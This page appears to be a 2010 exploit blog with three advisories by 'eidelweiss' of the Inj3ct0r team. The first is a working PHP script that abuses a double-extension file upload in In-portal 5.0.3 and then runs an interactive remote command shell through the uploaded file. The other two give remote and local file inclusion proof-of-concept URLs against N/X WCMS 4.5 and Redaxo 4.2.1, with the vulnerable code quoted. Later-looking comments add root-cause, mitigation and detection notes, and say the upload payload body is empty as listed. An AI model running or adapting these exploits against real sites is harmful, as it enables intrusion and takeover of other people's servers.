2010/04/23

In-portal 5.0.3 Remote Arbitrary File Upload Exploit

/*
-----------------------------------------------------------------
In-portal 5.0.3 Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Developers: http://www.in-portal.org/
Download : http://www.in-portal.com/download.html
exploited by ..: eidelweiss
Special thanks to all my friends who helped and supported me when I was sick
details..: works against an Apache server with the mod_mime module installed (and configured to honour multiple extensions, so that a name such as file.php.jpg can still be handed to the PHP handler)

[-] vulnerable code in path/core/editor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = BASE_PATH . WRITEBALE_BASE . '/user_files/';
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

With the default configuration of this script, an attacker may be able to upload arbitrary files containing malicious PHP code, because filenames with multiple extensions are not properly checked (only the final extension appears to be compared against the allow-lists above).
*/

*/
// Runtime setup for the exploit script: hide notices/warnings (the code
// below relies on that, e.g. $resp in http_send() is never initialised),
// remove the execution time limit, and cap each socket wait at 5 seconds.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
// Sends one raw HTTP/1.0 request ($packet, headers and body already
// assembled by the caller) to $host on TCP port 80 and returns the complete
// response — status line, headers and body — as a single string.
//
// Observations:
//  - fsockopen() is retried in a tight loop until it returns a handle, so an
//    unreachable host keeps the script looping (set_time_limit(0) above
//    permits that).
//  - $resp is never initialised; the first ".=" only passes silently because
//    error_reporting(0) hides the notice.
//  - Plain TCP on port 80: no TLS, no proxy and no redirect handling.
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
// Attempts the upload once per candidate extension in $file_ext and returns
// the first extension for which the uploaded "0k.php.<ext>" is executed as
// PHP by the server, or false if none works. Reads $host and $path from the
// globals set by the CLI argument handling at the bottom of the file.
//
// Wire-level picture (what a log reviewer or WAF rule would see):
//   1. POST <path>/core/editor/editor/filemanager/connectors/php/config.php
//      ?Command=FileUpload&CurrentFolder=<path> with a multipart/form-data
//      body holding one part, field "NewFile", filename "0k.php.<ext>".
//   2. GET <path>0k.php.<ext>, expecting the server to execute it.
// The double extension is the whole technique: the connector's allow-list
// (quoted in the header comment) appears to be checked against the final
// extension only, while Apache with mod_mime can still route a
// "name.php.<ext>" file to the PHP handler. Upload handling that does not
// share this weakness: reject filenames containing more than one extension,
// replace the client-supplied name with a generated one, store uploads
// outside the document root, and disable script execution for the upload
// directory.
function upload()
{
global $host, $path;

$connector = "/core/editor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";

// Multipart body. NOTE(review): the part content between the blank line
// and the closing boundary is empty, so the PHP payload that the "_code_"
// check below and the "Cmd:" header in the shell loop expect is not part
// of this listing.
$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "\r\n";
$data .= "--abcdef--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

// The FCKeditor-style connector answers with a JavaScript callback
// OnUploadCompleted(<code>,'<message>'); $html[1] is the code and $html[2]
// the message. Codes 0 and 201 are treated as success (201 presumably being
// the connector's "stored under a changed name" status).
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

// Fetch the file back. The test on the response: the literal word "print"
// absent and the marker "_code_" present means PHP executed the file; if
// the source comes back verbatim, the server served it as plain data.
// eregi() was deprecated in PHP 5.3 and removed in PHP 7.0.
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;

// Short pause before trying the next extension.
sleep(1);
}

return false;
}
// --- CLI entry point -------------------------------------------------------
print "\n+--------------------------------------------------------------------+";
print "\n| In-portal 5.0.3 Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+--------------------------------------------------------------------+\n";
// Two positional arguments: target host and the application's base path
// (leading and trailing slash, as in the examples).
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /In-portal/\n";
die();
}
// Read by upload() through "global $host, $path".
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
// NOTE(review): the CLI SAPI already defines STDIN, so this define() is
// redundant there (and the constant name is passed unquoted).
define(STDIN, fopen("php://stdin", "r"));
// Interactive loop. Each command is sent to the uploaded file as a request
// header "Cmd: <base64>" and the output is expected between "_code_" markers
// in the response body. Detection indicators: GET requests for a
// double-extension file (*.php.<ext>) carrying a non-standard "Cmd" header
// with base64 content, and responses containing "_code_". Typing "exit"
// leaves the loop. ("\p" is not an escape sequence, so the prompt prints
// with a literal backslash.)
while(1)
{
print "\portal-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>

2010/04/19

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability




====================================================
N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Works if: magic_quotes_gpc and magic_quotes_runtime are disabled (the ?path= / ?c[path]= PoCs below also presuppose that request parameters populate those variables, i.e. register_globals=On, and that allow_url_include permits remote includes).
Download: http://sourceforge.net/projects/nxwcms/files/0.%20N_X%20WCMS%204.5%20System/4.5%20Release%201/nx45.zip/download

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
sp3x (securityreason) get-well brother
Special To: m4rc0 & LeQhi (thank`s so much brother , respect to you)

Advisories: http://eidelweiss-advisories.blogspot.com/2010/04/nx-web-cms-nx-wcms-45-multiple.html

========================================================================

Description:

N/X 4.0 is a powerful content management system for the web.
N/X CMS is focused on delivering content in many powerful ways.
Its functions and content-types can be extended with the plugin-interface and a very very powerful API.

========================================================================

-=[ VULN C0de ]=-

**************************************************
[-] nx_path/www/text.php
**************************************************

// N/X www/text.php as shipped. Every include here is built from $cds->path,
// which is not set in this file; it is expected to come from
// nxheader.inc.php. NOTE(review): $cds is an object, so the advisory's
// plain ?path= PoC can only reach it through whatever nxheader.inc.php does
// with $c["path"] (not shown in this excerpt) — treat the www/*.php PoCs as
// unverified and the $c["path"] handling in nxheader.inc.php as the
// concrete case.
require_once "nxheader.inc.php";
include $cds->path."inc/header.php";

// Start of individual template
echo $cds->content->get("Headline");
br();
echo $cds->content->get("Body");


include $cds->path."inc/footer.php";
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/article.php
**************************************************

// N/X www/article.php as shipped. Same include pattern as text.php: the
// prefix $cds->path is supplied by nxheader.inc.php, not validated here.
// NOTE(review): the comment below promises type validation of the article
// id, but no code in this excerpt assigns or validates $article before it
// is handed to draw() — it may have been elided, or it may be missing.
require_once "nxheader.inc.php";
require_once $cds->path."inc/header.php";

// get the id of the article from the request
// do type validation

echo $cds->cluster->draw($article);
br();
br();

// link back to the page where the article was called
echo $cds->content->get("Backlink Title");

require_once $cds->path."inc/footer.php";
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/article_overview.php
**************************************************
require_once "nxheader.inc.php";
require_once $cds->path."inc/header.php"; // line 3

*****

require_once $cds->path."inc/footer.php"; // line 42
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/sitemap.php
**************************************************

require_once "nxheader.inc.php";
include $cds->path."inc/header.php"; // line 3

*****

include $cds->path."inc/footer.php"; // line 56
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/pagelayout.inc.php
**************************************************

**************************************************
[-] nx_path/www/nxheader.inc.php
**************************************************

/*
* Include this file in your page-templates
*/
// nxheader.inc.php, start of file. This is the root cause behind the
// ?c[path]= PoCs: $c["path"] is read before anything in this file
// initialises it, and when it is set the file includes
// "<that value>config.inc.php". Whoever can populate $c before this runs
// (register_globals=On lets a request parameter c[path] do it) therefore
// chooses what gets included: with allow_url_include enabled that is a
// remote include, and with it off it may still be a local file inclusion.
// Mitigation: never derive an include path from request data — compute the
// base path from __DIR__ and keep register_globals and allow_url_include
// off.
if (isset($c["path"])) {
require_once $c["path"]."config.inc.php";
} else {
require_once "../cms/config.inc.php";
}
include_once $c["path"]."api/cds/track_exit_pages.php";
require_once $c["path"]."api/cds/lib.inc.php";

*****

// Later in nxheader.inc.php. $c["pagetracking"], $c["usewebbug"] and $page
// are not initialised in the lines shown. NOTE(review): the advisory's LFI
// PoC (?page=) targets this file, but in this excerpt $page only reaches
// phpOpenTracker::log() and is never used in an include, so that claim is
// not substantiated by what is visible here. The "@" hides any error from
// the tracker call.
if ($c["pagetracking"] && ! $c["usewebbug"]) {
include_once $c["path"].'modules/stats/phpOpenTracker.php'; // line 31
@phpOpenTracker::log(array('document' => $page));
}
require_once $c["path"]."ext/jpcache/jpcache.php"; // line 34

**************************************************
[-] nx_path/cms/api/xml/lib.inc.php
**************************************************
// cms/api/xml/lib.inc.php. A pure include list: every path is prefixed with
// $c["path"], which this file never sets. It is meant to be loaded after
// config.inc.php has populated $c; requested directly with
// register_globals=On, c[path] is attacker-controlled (the ?c[path]= PoC
// below). Guard: refuse direct requests to library files (e.g. deny access to
// the include directories at the web server or check a constant defined by
// the front controller) and build the prefix from __DIR__ rather than from a
// request-reachable variable.
require_once $c["path"] . "api/xml/xpath.class.php";
require_once $c["path"] . "api/xml/meta.php";
require_once $c["path"] . "api/xml/plugin.php";
require_once $c["path"] . "api/xml/cluster_template.php";
require_once $c["path"] . "api/xml/cluster.php";
require_once $c["path"] . "api/xml/sitepage_master.php";
require_once $c["path"] . "api/xml/syndication.php";
require_once $c["path"] . "api/xml/xmlapi_prepare.php";
?>

**************************************************
[-] nx_path/cms/api/parser/lib.inc.php
**************************************************
// cms/api/parser/lib.inc.php. Same pattern as the xml library loader: the
// $c["path"] prefix is never initialised here, so the file is only safe when
// reached through the front controller with register_globals off. Deny
// direct web requests to this directory and derive the prefix from __DIR__.
require_once $c["path"] . "api/parser/nxparser.php";
require_once $c["path"] . "api/parser/class.filemanipulation.php";
require_once $c["path"] . "api/parser/class.mso2003.php";
require_once $c["path"] . "api/parser/class.openoffice.php";
require_once $c["path"] . "api/parser/nx2html.php";
require_once $c["path"] . "api/parser/html2nx.php";
require_once $c["path"] . "api/parser/launch_text.php";
require_once $c["path"] . "api/parser/importhtml.php";
require_once $c["path"] . "api/parser/importtext.php";
?>

**************************************************
[-] nx_path/cms/api/cms/lib.inc.php
**************************************************
// cms/api/cms/lib.inc.php. Same pattern again: an include list prefixed with
// an uninitialised $c["path"]. The last require_once has no semicolon, which
// PHP tolerates only because the closing "?>" tag terminates the statement.
// Mitigation as for the other loaders: no direct web access to this
// directory, prefix computed from __DIR__, register_globals off.
require_once $c["path"] . "api/cms/cache.php";
require_once $c["path"] . "api/cms/journal.php";
require_once $c["path"] . "api/cms/launch.php";
require_once $c["path"] . "api/cms/mass_operations.php";
require_once $c["path"] . "api/cms/oiddictionary.php";
require_once $c["path"] . "api/cms/paths.php";
require_once $c["path"] . "api/cms/plugin.php";
require_once $c["path"] . "api/cms/image.php";
require_once $c["path"] . "api/cms/sitepages.php";
require_once $c["path"] . "api/cms/sitepage_master.php";
require_once $c["path"] . "api/cms/synchronize.php";
require_once $c["path"] . "api/cms/cdsinformation.php";
require_once $c["path"] . "api/cms/acl/lib.inc.php";
require_once $c["path"] . "api/cms/log.php";
require_once $c["path"] . "api/cms/meta.php";
require_once $c["path"] . "api/cms/cluster_template.php";
require_once $c["path"] . "api/cms/cluster.php";
require_once $c["path"] . "api/cms/channel.php";
require_once $c["path"] . "api/cms/design.class.php";
require_once $c["path"] . "api/cms/designclasses.php"
?>
========================================================================

-=[ P0C RFI ]=-

http://127.0.0.1/[NX_PATH]/www/text.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/article.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/article_overview.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/sitemap.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/pagelayout.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/xml/lib.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/parser/lib.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/cms/lib.inc.php?c[path]= [inj3ct0r sh3ll]

etc , etc ,etc


-=[ P0C LFI ]=-

http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?page= [LFI]

etc , etc , etc,

[*] So many vulnerability here , use your skill and play your imagination [*]
[*] The vulnerabilities in the NX_path/wwwdev directory are, I think, the same as those in NX_path/www, which is why I do not list them here [*]

=========================| -=[ E0F ]=- |=================================

2010/04/18

Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability




========================================================================
Redaxo CMS 4.2.1 Remote File Inclusion Vulnerability
========================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.redaxo.de
Download: http://www.redaxo.de/files/redaxo4_2_1.zip

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
sp3x (securityreason) get-well brother

========================================================================

Description:

So soll ein Content-Management-System sein. REDAXO vereint hohe Flexibilität mit einfacher Handhabung für sinnvolle Nutzung.
Es eignet sich sowohl für kleinere Auftritte als auch für große und komplexe Internetportale.
Dank des modularen Aufbaus und der vielen Erweiterungsmöglichkeiten deckt REDAXO alle erforderlichen Funktionalitäten eines umfassenden Redaktionssystems ab.
Zusätzlich ist REDAXO ein Open-Source-System und somit kostenlos und kommerziell frei verwendbar.

========================================================================

-=[ VULN C0de ]=-

**************************************************
[-] redaxo/include/pages/specials.inc.php
**************************************************

// -------------- Defaults

// Redaxo include/pages/specials.inc.php. $subpage and $func are read from
// the request through rex_request(); $subpage only chooses between two fixed
// file names in the switch below, so it is not the problem. The include
// prefix $REX['INCLUDE_PATH'] is: it is not set in this file, so when the
// file is requested directly (instead of through Redaxo's entry script,
// which defines $REX) and register_globals is on, ?REX[INCLUDE_PATH]=
// supplies it — the PoC below. Same root cause and mitigation as any
// request-derived include path: define the prefix from __DIR__ and deny
// direct web requests to the include/ tree.

// -------------- Defaults

$subpage = rex_request('subpage', 'string');
$func = rex_request('func', 'string');

// -------------- Header

$subline = array(
array( '', $I18N->msg('main_preferences')),
array( 'lang', $I18N->msg('languages')),
);

rex_title($I18N->msg('specials'),$subline);

// Only these two values ever reach the require below.
switch($subpage)
{
case 'lang': $file = 'specials.clangs.inc.php'; break;
default : $file = 'specials.settings.inc.php'; break;
}

require $REX['INCLUDE_PATH'].'/pages/'.$file;

**************************************************
[-] redaxo/include/addons/version/pages/index.inc.php
**************************************************

// Redaxo include/addons/version/pages/index.inc.php (the template markup
// that followed has been lost in extraction). The very first statement
// includes a file under $REX['INCLUDE_PATH'], which nothing in this file
// defines — the same direct-request + register_globals exposure as
// specials.inc.php, and the basis of the first PoC below.
require $REX['INCLUDE_PATH'].'/layout/top.php';

rex_title('Version AddOn');

?>

msg('code_for_module_input'); ?>




msg('module_intro_help'); ?>


msg('module_rights'); ?>






require $REX['INCLUDE_PATH'].'/layout/bottom.php';

========================================================================

-=[ P0C ]=-

http://127.0.0.1/redaxo_path/include/addons/version/pages/index.inc.php?REX[INCLUDE_PATH]=[inj3ct0r sh3ll]

http://127.0.0.1/redaxo_path/include/pages/specials.inc.php?subpage=lang&REX[INCLUDE_PATH]=[inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |=================================